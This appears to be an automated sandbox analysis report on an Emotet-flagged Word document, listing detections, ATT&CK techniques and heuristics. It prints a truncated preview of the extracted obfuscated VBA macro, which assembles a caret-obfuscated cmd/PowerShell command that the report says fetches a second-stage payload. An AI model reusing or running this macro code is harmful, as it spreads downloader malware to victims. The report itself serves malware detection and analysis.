Verdict: MALICIOUS
Risk Score: 142
Malware Insights
MITRE ATT&CK:
- T1059.005 (Visual Basic)
- T1566.001 (Spearphishing Attachment)
The file contains a VBA macro with an AutoOpen function, a common technique for Emotet. The macro constructs and executes a PowerShell command, which appears to be obfuscated and designed to download and run a second-stage payload. The ClamAV detection also strongly suggests Emotet.
Heuristics (5)
- ClamAV: Doc.Downloader.Emotet-6899213-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6899213-0
- VBA macros detected (medium, OLE_VBA_MACROS; 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 46571 bytes | 656bdf585798e97b5c3c3ef5c7d44717808431b6e8dae0a6636d87c51abc8aa8 |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "JoaOPaL"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "OrDtLXsUjiClp"
Function RKXCmdipXB()
On Error Resume Next
IsArray CDate(534)
LAbhA = zDbvl * qUMjj
cLYiAP = "mD" + " /v^:O^" + " ^ " + " " + "/r" + CStr(Chr(ZlQoajHzhIzP + wHQbBvBwU + 34 + ZnVIBtif + wwWPQNMqPz))
IsArray 98633 - 56508
LAbhA = Sin(5)
PmGhkrcO = "se^" + "T 2gR=p" + "^9we\" + "s^h^e" + "ll^ -e" + " J" + "A^BN" + "A,9^A^{" + "gA^+A" + "^,^[^"
LAbhA = SMKpGM + LWNtc
VarType Oct(QWrFqV - 87459)
VarType uVNAw * FTwEq
sIBZd = "A(Q^" + "B3^AC^" + "`^A$^" + "w" + "^B" + "^i" + "A,9" + "^A(^Q^B" + "j^A^HQ^" + "A^I^ABO" + "^A,UA" + "d" + "^AA^"
LAbhA = LCase(vpSCAq)
VarType wUwWXH * XwzsEu
VarType Sin(8489)
bwFCpL = "u^A^" + "Fc" + "A(^Q^B" + "^iAE" + "MA$A^"
IsArray CCur(74669 * ITVRkV)
VarType 88730 * 70644 - cSzusA / uBzLDK
LAbhA = CDate(44)
VarType DbqkmK * cnZQE
IsArray Cos(317)
hUVJGjHPjv = "B^p" + "^A^,^UA" + "^$^" + "gB`AD^s" + "A" + "J^A^BU"
IsArray Str(jDQCZY / zHUMq)
LAbhA = LCase(Qsrzi)
mdHHWTJzEwr = "A^H{" + "^A^" + "d" + "gA+^" + "ACc^Aa^" + "A^B" + "^`A" + "^" + "HQ^Ac^" + "A^A^" + "6^AC" + "8^AL^w" + "^"
VarType Atn(HquiQk)
KjQWdRlha = "BzA^,E^" + "A$gBv" + "^" + "AC^[Aa" + "^" + "Q^B" + "/^" + "AC8^AV" + "AB^"
VarType zFHSF / TECjAL + jQiwJt / MriYdI
LAbhA = jMktXk - DvwHi
VarType 92626 + TRBsd - InjJh * HiDTb
LAbhA = MpcfMB / YwBVf + fJDsL + RnQBwl
btJzHZKjLc = ".A^" + "," + "IA^a" + "^" + "gB(AD" + "^M^A$^" + "g^BA^" + "A,^gA" + "^d^"
VarType Month(uotDBN * Yivow)
IsArray Tan(26261 + VzkZr * vnOfji * fSJMJw)
IsArray Rnd(11274 / iozAW)
VarType CBool(MNrvi + KWsbX / DVnoMv + abLrVq)
nQrcVikWBz = "AB^`A" + "^HA^AO" + "g^AvAC" + "^8A(" + "^wB/A^H" + "U^" + "A^egBv" + "A,w^A^d" + "QB^i^" + "AC[^A" + "cgB^" + "1A" + "C"
RKXCmdipXB = cLYiAP + PmGhkrcO + sIBZd + bwFCpL + hUVJGjHPjv + mdHHWTJzEwr + KjQWdRlha + btJzHZKjLc + nQrcVikWBz
VarType Tan(kkslh)
End Function
Function QZVfIFDhQ()
On Error Resume Next
IsArray CStr(YvBWV)
VarType CBool(92794 * NNjTX)
VarType Sqr(33802 + JKrkpi)
HrRNDUhoih = "8A^Mw^B" + "QA^" + "H^I^A" + "^aQ^" + "B^U^A^F" + ".^A" + "^" + "QA" + "B^9^" + "AH^QA^d" + "A" + "B"
IsArray Str(bRqmw)
VarType 74556 / uzPbtV
IsArray vmIjl + vQrUz - 65198 + HEPZph
LAbhA = iuBzQI + DZwIz * 13156 * 45865
FEvGOawdhhE = "^" + "w^A^D9A" + "^Lw^AvA" + "^,{A$w^" + "B/A,U" + "^Ae^" + "A^B^" + "`^" + "A" + "^H^I^A" + "^" + "{^Q"
LAbhA = Str(kRrGj)
IsArray TypeName(7)
ZOSDu = "^B." + "^A,^.A" + "$g^BnA" + "^" + "," + "{Acg^" + "B^[^" + "AC" + "[" + "A$w"
IsArray bzsco / WIFlqJ
IsArray rvhuOl / SoorW - cSlvW * sjwYw
VarType Second(812)
VarType CVar(Vqinj)
iNWTjQr = "^" + "B/" + "^A," + "cA" + "^Lw^Bm"
LAbhA = 23399 - RVJBPB
VarType FvMMO - 12698 + 91623 + VrNii
LAbhA = zJzIX * vmAbas - 6336 * oVSmwo
LAbhA = nvhJL / oDEnQc * 52870 / sWjNAK
VarType CBool(8)
dNAwlJVRT = "^A" + "D^{^A" + "^" + "W" + "^Q^B/A" + "^,^.^A" + "Q^AB" + "^9AH^Q" + "^Ad" + "^ABw^A^"
LAbhA = CDate(58941 + iiUHp)
IsArray CCur(jurhXd)
IsArray CVar(45104 + EEwKSo)
MjiOIa = "D^9ALw^" + "AvA^,^E" + "^A" + "$" + "^" + "AB/A,U^" + "A^"
VarType VYFiC + DHjRA / onlcm / 81457
VarType ainIE / IXhLDo
LAbhA = bLIuI * HCVKlv
BtkZikvtjlw = "{Q" + "^B" + "^" + ".^" + "A^H^" + "." + "^A"
VarType WMZLjO - fwHuri * lcXQE * JihIz
LAbhA = CDate(Ubquw + TRsYu)
VarType CByte(16704 + iBIFVl)
VarType 5463 + zuBoN
IsArray 17292 / 54837
KFacI = "^aA^Bv" + "^A^H" + "MAd^A^" + "AuA,.^A" + "^dA^B^" + "9A^,.A" + "^$^g^" + "Bx^AC" + "[^A$" + "gB^lA" + "^H" + "^QAL^"
LAbhA = LCase(8)
VarType TimeValue(QEcVd * pjupX)
ouVBnoSHR = "wA^xA,^" + "I^A^W" + "^gB" + "A^A^," + "gAd^A^B" + "^`^A^H^" + "AAOg" + "A" + "v" + "AC^8^A"
IsArray HqYoo - RMdcvZ - DRWEtv * dbjJiM
LAbhA =
... (truncated)